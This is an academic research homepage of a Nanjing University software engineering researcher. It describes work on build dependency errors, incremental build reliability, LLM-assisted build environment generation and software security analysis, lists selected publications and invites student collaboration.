Software Engineering · Software Security · AI4SE · LLM Agents

Intelligent Software Engineering
for Real Development Workflows

My research focuses on observability, correctness, efficiency, and trustworthy data engineeringin build systems, continuous integration, security analysis, and agent-assisted software development. I work on build dependency errors, incremental build reliability, automatic repair of missing dependencies, and LLM-assisted build environment generation, with the goal of bringing Coding Agents and software analysis techniques into real development workflows.

Build Build ordering, build dependency error detection, and missing dependency repair
AI4SE LLM-assisted software engineering, Agentic Coding, and code intelligence
LLM SCA Software composition analysis, LLM application risk paths, and vulnerability reachability
Research Agenda

From “generating code” to “participating in software engineering”

Intelligence in software engineering is not merely about calling large language models. It requires integrating models, tools, context, execution environments, and quality validation into real development workflows.

Build Dependency Errors and Incremental Build Reliability I study detection, explanation, and repair methods for incomplete dependency declarations, mismatches between build execution and declarations, and error propagation caused by configuration switches in incremental builds.
Build Ordering and Build Efficiency For multi-configuration incremental builds, I characterize reuse boundaries and ordering sensitivity across configurations and explore ordering strategies that improve efficiency under correctness constraints.
Build Environment Generation and Reproducible Builds For Docker, Make, and C/C++ projects, I explore automated build environment generation, artifact consistency validation, and software supply-chain risk control.
Trustworthy Software
R&D Efficiency and Agentic Engineering
Using real repositories, real toolchains, and real industrial processes as research objects, I study integrated methods that connect data, models, tools, and validation.
LLM Application Architecture and SCA I identify LLM call sites, capability paths, external components, and vulnerability propagation relations to enable software composition analysis for LLM applications.
Agentic Coding Data Engineering I construct high-quality task libraries, trajectory libraries, validation rules, and automated judging sandboxes to support enterprise Coding Agent training and evaluation.
LLM-Assisted Software Analysis For bug localization, vulnerability detection, code repair, and build diagnosis, I explore knowledge enhancement, context organization, and trustworthy validation.
Build Dependency Research

Build Dependency Errors: From Incremental Build Reliability to Automated Repair

This is my most continuous research thread: starting from why incremental builds go wrong, I further study how to detect, explain, and repair such errors, and how to generate reliable build environments.

Core Problem: Build systems do more than “run commands”

Modern build systems rely on scripts, declarative files, toolchains, system environments, and historical build states. When dependency declarations are missing, build execution diverges from declarations, configuration-switching orders are inappropriate, or environmental dependencies are incomplete, incremental builds may produce stale artifacts, incorrect binaries, or non-reproducible results. Therefore, build research is not only about acceleration; it also involves correctness boundaries, dependency evidence, error localization, and automated repair.

ISSTA'24 Incremental build dependency error detection
TSE'25 Dynamic execution–declaration consistency analysis
ASE'25 Automatic repair of missing dependency errors
01

Multi-configuration incremental build ordering

I study build reuse relations and ordering sensitivity across configurations, and explore how to schedule configuration builds to reduce redundant work while preserving correctness.

02

Incremental build dependency error detection

For hidden missing dependencies in incremental builds, I identify which file, command, or artifact relations are not correctly modeled by the build system.

03

Consistency Analysis between Build Execution and Dependency Declarations

By dynamically analyzing build execution behavior and comparing it with build declarations, I detect incomplete declarations, over-declarations, and execution-declaration dependency deviations.

04

Automatic repair of missing dependency errors

I move from detection to repair by combining error logs, project structure, package-management knowledge, and validation feedback to generate deployable dependency repair solutions.

05

LLM-Assisted Build Environment Generation

For Dockerfile generation and build environment reproduction, I combine build knowledge, repository context, and execution validation to improve automation in environment configuration.

Projects & Methodology

Major Research Projects and Technical Roadmap

My research starts from real software repositories and engineering workflows, with automated observation, verifiable experiments, and tool prototypes as core deliverables.

Build Dependency Error Detection and Repair

I study missing dependencies in incremental builds, inconsistencies between build execution and declarations, and missing system/library dependencies, forming a continuous research chain from detection and explanation to automated repair.

Incremental Build Dependency Error Dynamic Analysis Auto Repair

Systematic Build Acceleration

I analyze build time from three levels—multi-configuration builds, single builds, and critical paths—characterizing rebuild closures, waiting losses, long-chain phases, and attainable acceleration upper bounds.

Build DAG Critical Path Reuse Boundary Ninja / Make

Software Composition Analysis for LLM Applications

Through call chains and capability paths, I identify real dependency components in LLM applications and analyze the gaps among declared dependencies, actual usage, configuration-mediated usage, and vulnerability reachability.

SCA Capability Path Vulnerability Architecture Mining

High-Quality Training Data Construction for Agentic Coding

This project focuses on real tasks such as environment configuration, dependency repair, and build failure diagnosis. It records process behaviors including task planning, command execution, tool invocation, error recovery, rollback, and retry, and safeguards data quality through automated solvability checks, build/test validation, and risk filtering.

Task Library Trajectory Library Sandbox Quality Report

LLM-Assisted Software Security and Quality Assurance

By combining static analysis, dynamic execution evidence, vulnerability knowledge, and LLM reasoning, I study vulnerability detection, malicious injection variant detection, bug localization, and code repair.

Software Security Vulnerability Detection Bug Localization LLM Prompting
How I Work

Research Methodology: From Engineering Phenomena to Verifiable Tools

2

Multi-Source Evidence Extraction

I integrate code, configuration, dependency declarations, build logs, test results, tool invocation traces, and repository history into traceable evidence chains.

3

Automated Analysis and Generation

I combine program analysis, rule systems, knowledge graphs, and LLMs to support localization, diagnosis, repair, scheduling, and data generation.

4

Experimental Validation and Scenario Feedback

I evaluate correctness, stability, efficiency, and deployability through benchmarks, sandboxes, real-repository reproduction, and industrial scenario trials.

Typical Deliverables

Rather than stopping at conceptual contributions, I emphasize engineering-verifiable outcomes: data specifications, task libraries, trajectory libraries, validation tools, prototype systems, experimental reports, and industrial scenario validation.

01Data Specification
02Task Library
03Trajectory Library
04Validation Tools
05Quality Report
Selected Publications

Selected Publications

First-author papers Main thread: build systems, build dependency errors, and build environment generation
PACMSE
FSE 2024

Towards Efficient Build Ordering for Incremental Builds with Multiple Configurations First Author

Lyu J, Li S, Zhang H, et al.

This work studies ordering sensitivity and reuse opportunities in multi-configuration incremental builds, and explores ordering methods for improving build efficiency in multi-configuration settings.

Proceedings of the ACM on Software Engineering, 2024, 1(FSE): 1494–1517.
ISSTA
2024

Detecting Build Dependency Errors in Incremental Builds First Author

Lyu J, Li S, Zhang H, et al.

This work targets errors caused by missing or incomplete dependency declarations in incremental builds, and proposes automated detection methods for uncovering hidden build dependency problems.

Proceedings of the 33rd ACM SIGSOFT International Symposium on Software Testing and Analysis, 2024: 1–12.
TSE
2025

Detecting Build Dependency Errors by Dynamic Analysis of Build Execution against Declaration First Author

Lyu J, Li S, Liu B, et al.

This work dynamically analyzes build execution behavior and compares it against dependency declarations to identify inconsistencies between execution dependencies and declared dependencies.

IEEE Transactions on Software Engineering, 2025.
ASE
2025

Automatic Fixing of Missing Dependency Errors First Author

Lyu J, Zhang H, Yang L, et al.

This work advances from dependency error detection to automated repair by combining error evidence, dependency knowledge, and validation feedback to generate deployable fixes.

2025 40th IEEE/ACM International Conference on Automated Software Engineering, IEEE, 2025: 597–609.
ICSE
2026

Automatic Dockerfile Generation with Large Language Models First Author

Lyu J, Zhang H, et al.

This work studies LLM-based Dockerfile generation and software build automation, focusing on generation and validation from repository context to executable build environments.

Proceedings of the 48th IEEE/ACM International Conference on Software Engineering, 2026.
Selected co-authored papers Software R&D efficiency, code review, blockchain software engineering, AI4SE, and software security
ASE
2024

An Explainable Automated Model for Measuring Software Engineer Contribution

Li Y, Zhang H, Jin Y, Ren Z, Dong L, Lyu J, et al.

This work studies explainable automated models for measuring software engineer contribution, supporting R&D efficiency assessment and engineering management decisions.

Proceedings of the 39th IEEE/ACM International Conference on Automated Software Engineering, 2024: 783–794.
ASE
2024

GPP: A Graph-Powered Prioritizer for Code Review Requests

Yang L, Xu J, Zhang H, Wu F, Lyu J, et al.

This work uses graph-based modeling to prioritize code review requests, improving review resource allocation and engineering collaboration efficiency.

Proceedings of the 39th IEEE/ACM International Conference on Automated Software Engineering, 2024: 104–116.
TSE
2025

Decision Support for Selecting Blockchain-Based Application Design Patterns with Layered Taxonomy and Quality Attributes

Wang Y, Huang Y, Li J, Li S, Zhang H, Lyu J, et al.

This work constructs a layered taxonomy and quality-attribute-driven decision support method for selecting blockchain-based application design patterns.

IEEE Transactions on Software Engineering, 2025, 51(4): 1039–1066.
PACMSE
FSE 2025

A Knowledge Enhanced Large Language Model for Bug Localization

Li Y, Liu B, Zhang T, Wang Z, Lo D, Yang L, Lyu J, et al.

This work explores context organization, knowledge injection, and localization effectiveness of knowledge-enhanced LLMs for bug localization.

Proceedings of the ACM on Software Engineering, 2025, 2(FSE): 1914–1936.
TOSEM
2024

One Size Does Not Fit All: Investigating Efficacy of Perplexity in Detecting LLM-Generated Code

Xu J, Zhang H, Yang Y, Yang L, Cheng Z, Lyu J, et al.

This work analyzes the applicability boundaries of perplexity for detecting LLM-generated code and reveals the limitations of one-size-fits-all detection strategies across different scenarios.

ACM Transactions on Software Engineering and Methodology, 2024.
TSE
2026

Towards Robust Detection for Malicious Injection Variants

Yang Y, Liu B, Zhang H, Xu J, Zhou X, Lyu J, et al.

This work studies robust software security detection methods and generalization capability for malicious injection variants.

IEEE Transactions on Software Engineering, 2026 [to appear].
Students & Collaboration

Students Interested in Real Software Engineering Problems Are Welcome

I especially welcome students who have engineering implementation skills, are willing to dive into real toolchains and open-source repositories, and are interested in software security, testing, or AI4SE.

Potential Topics

Software build, software supply-chain security, program analysis, LLM agents, code intelligence, automated testing, and vulnerability detection.

Expected Skills

Ability to read and modify real codebases, familiarity with at least one of Python/Java/C, and willingness to conduct experiments, reproduction studies, and tool development.

Mentoring Style

Starting from students’ interests and small concrete problems, we gradually develop reproducible experiments, tool prototypes, paper submissions, or industrial collaboration deliverables, with weekly one-on-one meetings.

Contact

Open to Collaboration

Please feel free to reach out if you are interested in software R&D efficiency, build systems, software security, AI4SE, Agentic Coding, or the deployment of enterprise-level development tools.

Email: junlyu@nju.edu.cn Nanjing University
Send Email